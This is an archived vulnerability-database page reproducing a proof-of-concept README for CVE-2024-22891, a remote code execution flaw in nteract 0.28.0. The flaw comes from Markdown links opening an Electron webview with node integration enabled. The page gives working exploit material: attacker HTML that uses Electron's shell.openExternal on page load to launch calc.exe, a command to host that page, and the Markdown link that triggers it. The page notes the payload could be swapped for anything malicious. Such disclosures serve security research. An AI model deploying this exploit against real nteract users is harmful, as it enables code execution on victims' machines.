关联漏洞
标题:Nteract 安全漏洞 (CVE-2024-22891)Description:Nteract是Nteract公司的一个由 React 组件、JavaScript 包和基于 Jupyter 规范构建的应用程序组成的生态系统。 Nteract v.0.28.0版本存在安全漏洞,该漏洞源于Markdown链接存在远程代码执行(RCE)漏洞。
Description
PoC for CVE-2024-22891
介绍
# Nteract PoC
A Proof-Of-Concept for CVE-2024-22891 vulnerability. <br><br>
nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution.
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.
As a PoC there is a python file that automates the process.
---------------------------------------
#### 1.Vunerability Overview:
* Vulnerability Subject: Markdown link RCE
* Vulnerability Type: Other: Open Redirect
* Manifestation of the Issue: Electron Webview
* Affected Component: markdown
* Attack Type: Remote Code Execution
* Attack Vectors: To exploit the vulnerability, someone must click on the link or access the shared project's link.
* Reserved CVE Number: CVE-2024-22891
---------------------------------------
#### 2. Vulnerability Cause:
* nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution (because nodeIntegration in webPreferences is true).
* Exploit explain
* When generating links through MarkDown within the application, it creates a WebView via Electron, allowing external access to the link. Consequently, an attacker can achieve Remote Code Execution (RCE) by connecting to the link leading to the attacker's server.
Proof-of-concept (POC)
----------------------
**Step 1) Attacker make server to Source code for launching a calc.exe using openExternal() function.**
```html
<html>
<head>
<title>jruru Link</title>
</head>
<body>
<a id="jruruLink">jruru Link</a>
<script>
// Script function definition
function openExternal() {
try {
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
} catch(e) {
alert('JRURU - External link cannot be opened.');
console.error(e);
}
}
// Automatically execute openExternal function after the page is loaded
document.addEventListener('DOMContentLoaded', function() {
openExternal();
});
</script>
</body>
</html>
```
**Note:** ※ If you want to test it quickly, create a server on the attacker's PC with the following code.
```py
$ python -m http.server 80
```
**Step 2) Execute the nteract application on the victim's system and create a Markdown link, or share the attacker's ipynb file as an example code. Then, execute calc.exe.**
```markdown
[Read This] (http://[attcker_adress]/shard_data.html)
```
---------------------------------------
### 3. Additional Information
When executing a .ipynb file through file sharing, be cautious as the link may not be visible.This calc.exe could have been any malicious payload local or remote which could have given the attacker entire access to the victim’s system.
文件快照
[4.0K] /data/pocs/fb659aefe2c77770c8ae06365603f86292ce5492
├── [ 694] jruru.html
└── [3.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →